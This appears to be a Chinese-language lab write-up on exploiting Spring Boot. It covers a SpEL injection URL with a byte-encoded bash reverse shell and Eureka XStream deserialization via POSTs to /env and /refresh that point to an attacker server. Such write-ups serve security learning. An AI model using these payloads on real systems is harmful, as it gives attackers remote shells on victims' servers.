springBoot漏洞整理

springboot-spel-rce

0x00 漏洞发现

image-20240214180957037

这个是模拟的查找的书的一个页面

发现存在漏洞,因为6*2 已经被计算了

0x01

尝试利用这个漏洞

攻击者使用nc 开启监听

image-20240214181250306

构造一个反弹shell 的指令

image-20240214181324669

将这个构造成字节码

image-20240214181613443

然后构造payload 发送

1
http://192.168.79.128:9091/article/?id=${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x62,0x61,0x73,0x68,0x20,0x2d,0x63,0x20,0x7b,0x65,0x63,0x68,0x6f,0x2c,0x20,0x59,0x6d,0x46,0x7a,0x61,0x43,0x41,0x74,0x61,0x53,0x41,0x2b,0x4a,0x69,0x41,0x76,0x5a,0x47,0x56,0x32,0x4c,0x33,0x52,0x6a,0x63,0x43,0x38,0x78,0x4f,0x54,0x49,0x75,0x4d,0x54,0x59,0x34,0x4c,0x6a,0x63,0x35,0x4c,0x6a,0x45,0x7a,0x4f,0x43,0x38,0x78,0x4f,0x54,0x6b,0x35,0x4f,0x53,0x41,0x77,0x50,0x69,0x59,0x78,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x65,0x36,0x34,0x2c,0x20,0x2d,0x64,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x68,0x2c,0x20,0x2d,0x69,0x7d}))}

image-20240214182006023

利用成功

eureka xstream deserialization RCE

0x00

image-20240214185527658

发现是springboot 尝试抓个包

0x01

开启监听

image-20240214190332438

开启恶意的服务器

image-20240214190400544

记得修改成自己反弹的主机

image-20240214190257877

开启成功

0x02

尝试攻击

image-20240214190525831

image-20240214190520552

判断版本是1

直接使用payload 

1
2
3
4
POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://192.168.79.1:9999/example
1
2
POST /refresh
Content-Type: application/x-www-form-urlencoded

就会发现已经反弹了

#整理
springBoot漏洞整理
https://tsy244.github.io/2024/02/14/整理/springBoot漏洞整理/
Author
August Rosenberg
Posted on
February 14, 2024
Licensed under